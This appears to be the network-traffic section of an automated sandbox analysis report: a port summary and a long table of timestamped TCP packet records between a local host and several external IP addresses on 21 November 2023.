                                                                          No static file info

                                                                          Download Network PCAP: filteredfull

                                                                          • Total Packets: 950
                                                                          • 5228 undefined
                                                                          • 443 (HTTPS)
                                                                          • 80 (HTTP)
                                                                          • 53 (DNS)
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 21, 2023 17:58:24.456010103 CET49675443192.168.2.4173.222.162.32
                                                                          Nov 21, 2023 17:58:31.767149925 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:31.767188072 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:31.767245054 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:31.769376040 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:31.769387960 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:31.770514011 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.770551920 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:31.770598888 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.771090984 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.771106005 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:31.970154047 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:31.970571995 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:31.970583916 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:31.971791029 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:31.971873045 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:31.974394083 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:31.974484921 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:31.974934101 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:31.974941015 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:31.996576071 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:31.996782064 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.996793032 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:31.997109890 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:31.997169018 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.997958899 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:31.998022079 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.999249935 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.999304056 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:31.999381065 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:31.999387980 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:32.048810005 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:32.185260057 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:32.185305119 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:32.191034079 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:32.191131115 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:32.191178083 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:32.191668034 CET49731443192.168.2.4142.251.16.139
                                                                          Nov 21, 2023 17:58:32.191682100 CET44349731142.251.16.139192.168.2.4
                                                                          Nov 21, 2023 17:58:32.200160980 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:32.200366020 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:32.200416088 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:32.207386017 CET49729443192.168.2.4142.251.16.84
                                                                          Nov 21, 2023 17:58:32.207395077 CET44349729142.251.16.84192.168.2.4
                                                                          Nov 21, 2023 17:58:34.052809954 CET4973880192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:34.053601027 CET4973980192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:34.065722942 CET49675443192.168.2.4173.222.162.32
                                                                          Nov 21, 2023 17:58:34.177340984 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.177371979 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:34.177453041 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.177828074 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.177841902 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:34.188314915 CET4974180192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:34.279690027 CET804973945.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:58:34.279773951 CET4973980192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:34.279964924 CET4973980192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:34.285294056 CET804973845.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:58:34.285391092 CET4973880192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:34.376548052 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:34.376835108 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.376842976 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:34.377851963 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:34.377933025 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.379337072 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.379393101 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:34.425687075 CET804974145.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:58:34.425873995 CET4974180192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:34.428677082 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.428683996 CET44349740142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:58:34.471224070 CET49740443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:58:34.507528067 CET804973945.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:58:35.866746902 CET804973945.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:58:35.917526007 CET4973980192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:36.214145899 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.214227915 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.214303017 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.217370987 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.217408895 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.287594080 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.287682056 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:36.287806034 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.288255930 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.288292885 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:36.425144911 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.425317049 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.436970949 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.436991930 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.437232971 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.485605955 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.555139065 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.601264954 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.655644894 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.655718088 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.655870914 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.655916929 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.655916929 CET49742443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.655936956 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.655950069 CET4434974223.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.713779926 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.713816881 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.713881969 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.714775085 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.714795113 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.807907104 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:36.808295012 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.808341980 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:36.809349060 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:36.809418917 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.814410925 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.814488888 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:36.814830065 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.814850092 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:36.860761881 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:36.921394110 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.921477079 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.922768116 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.922774076 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.922976017 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:36.924953938 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:36.965262890 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:37.123500109 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:37.123564959 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:37.123617887 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:37.124772072 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:37.124787092 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:37.124794960 CET49744443192.168.2.423.199.50.2
                                                                          Nov 21, 2023 17:58:37.124799967 CET4434974423.199.50.2192.168.2.4
                                                                          Nov 21, 2023 17:58:37.412708998 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:37.412816048 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:37.412920952 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:37.414052010 CET49743443192.168.2.464.137.16.19
                                                                          Nov 21, 2023 17:58:37.414067984 CET4434974364.137.16.19192.168.2.4
                                                                          Nov 21, 2023 17:58:37.635667086 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.635751009 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.635884047 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.637651920 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.637691021 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.637742996 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.638156891 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.638194084 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.638477087 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.638489962 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.917045116 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.917326927 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.917376041 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.918334961 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.918503046 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.919312954 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.919365883 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.919394016 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.919517040 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.919534922 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.919711113 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.919723988 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.920628071 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.920687914 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.921490908 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.921550035 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.969763041 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:37.969769955 CET44349746104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:37.969790936 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:38.016854048 CET49746443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:38.524705887 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:38.524791956 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:38.524882078 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:38.536905050 CET49745443192.168.2.4104.21.14.233
                                                                          Nov 21, 2023 17:58:38.536946058 CET44349745104.21.14.233192.168.2.4
                                                                          Nov 21, 2023 17:58:38.695878029 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:38.695947886 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:38.696026087 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:38.696403980 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:38.696435928 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:38.958784103 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.003227949 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.046679974 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.046741009 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.047703981 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.047796965 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.049618006 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.049685955 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.049774885 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.049797058 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.102020025 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.764842987 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.764875889 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.764955044 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.765062094 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.765086889 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.765086889 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.765091896 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.765137911 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.765182018 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.765182018 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.765202999 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.765799046 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.765858889 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.765873909 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.766246080 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.766272068 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.766292095 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.766297102 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.766309023 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.766344070 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.767064095 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.767123938 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.767136097 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.767174006 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.767199993 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.767237902 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.767252922 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.767296076 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.768012047 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768055916 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768105984 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768110037 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.768130064 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768177986 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.768837929 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768893957 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768920898 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768944025 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768943071 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.768966913 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.768989086 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.769745111 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.769764900 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.769799948 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.769814014 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.769849062 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.769869089 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.769880056 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.769927979 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.770632029 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.770678997 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.770721912 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.770735025 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.771446943 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.771518946 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.771523952 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.771534920 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.771578074 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.771581888 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.771599054 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.771658897 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.772408009 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.772476912 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.816719055 CET49748443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.816750050 CET44349748104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.816817045 CET49748443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.817209959 CET49749443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.817256927 CET44349749104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.817303896 CET49749443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.817692995 CET49750443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.817785025 CET44349750104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.817846060 CET49750443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.818798065 CET49751443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.818875074 CET44349751104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.818941116 CET49751443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.819248915 CET49752443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.819304943 CET44349752104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.819364071 CET49752443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.819906950 CET49748443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.819920063 CET44349748104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.820159912 CET49749443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.820173979 CET44349749104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.820396900 CET49750443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.820434093 CET44349750104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.820632935 CET49751443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.820678949 CET44349751104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.821003914 CET49752443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.821034908 CET44349752104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.889543056 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.889617920 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.889705896 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.889807940 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.889808893 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.889808893 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.890031099 CET49747443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.890058994 CET44349747104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.890546083 CET49753443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.890573025 CET44349753104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:39.890636921 CET49753443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.891127110 CET49753443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:39.891139984 CET44349753104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.111862898 CET44349748104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.112337112 CET49748443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.112353086 CET44349748104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.112651110 CET44349748104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.112971067 CET49748443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.113017082 CET44349748104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.113127947 CET49748443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.132888079 CET44349751104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.133331060 CET49751443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.133372068 CET44349751104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.133970976 CET44349752104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.134166002 CET49752443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.134206057 CET44349752104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.134582043 CET44349751104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.134661913 CET49751443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.135034084 CET49751443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.135109901 CET44349751104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.135186911 CET49751443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.135195017 CET44349751104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.135313988 CET44349752104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.135380983 CET49752443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.135680914 CET49752443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.135757923 CET44349752104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.135757923 CET49752443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.146404982 CET44349750104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.146677971 CET49750443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.146738052 CET44349750104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.147850990 CET44349750104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.147931099 CET49750443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.148264885 CET49750443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.148355007 CET44349750104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.148396015 CET49750443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.148775101 CET44349749104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.148967028 CET49749443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.148981094 CET44349749104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.149473906 CET44349749104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.149888039 CET49749443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.149966002 CET44349749104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.150078058 CET49749443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.153088093 CET44349753104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.153317928 CET49753443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.153333902 CET44349753104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.154422998 CET44349753104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.154494047 CET49753443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.154798031 CET49753443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:40.154856920 CET44349753104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:40.154901981 CET49753443192.168.2.4104.21.62.203
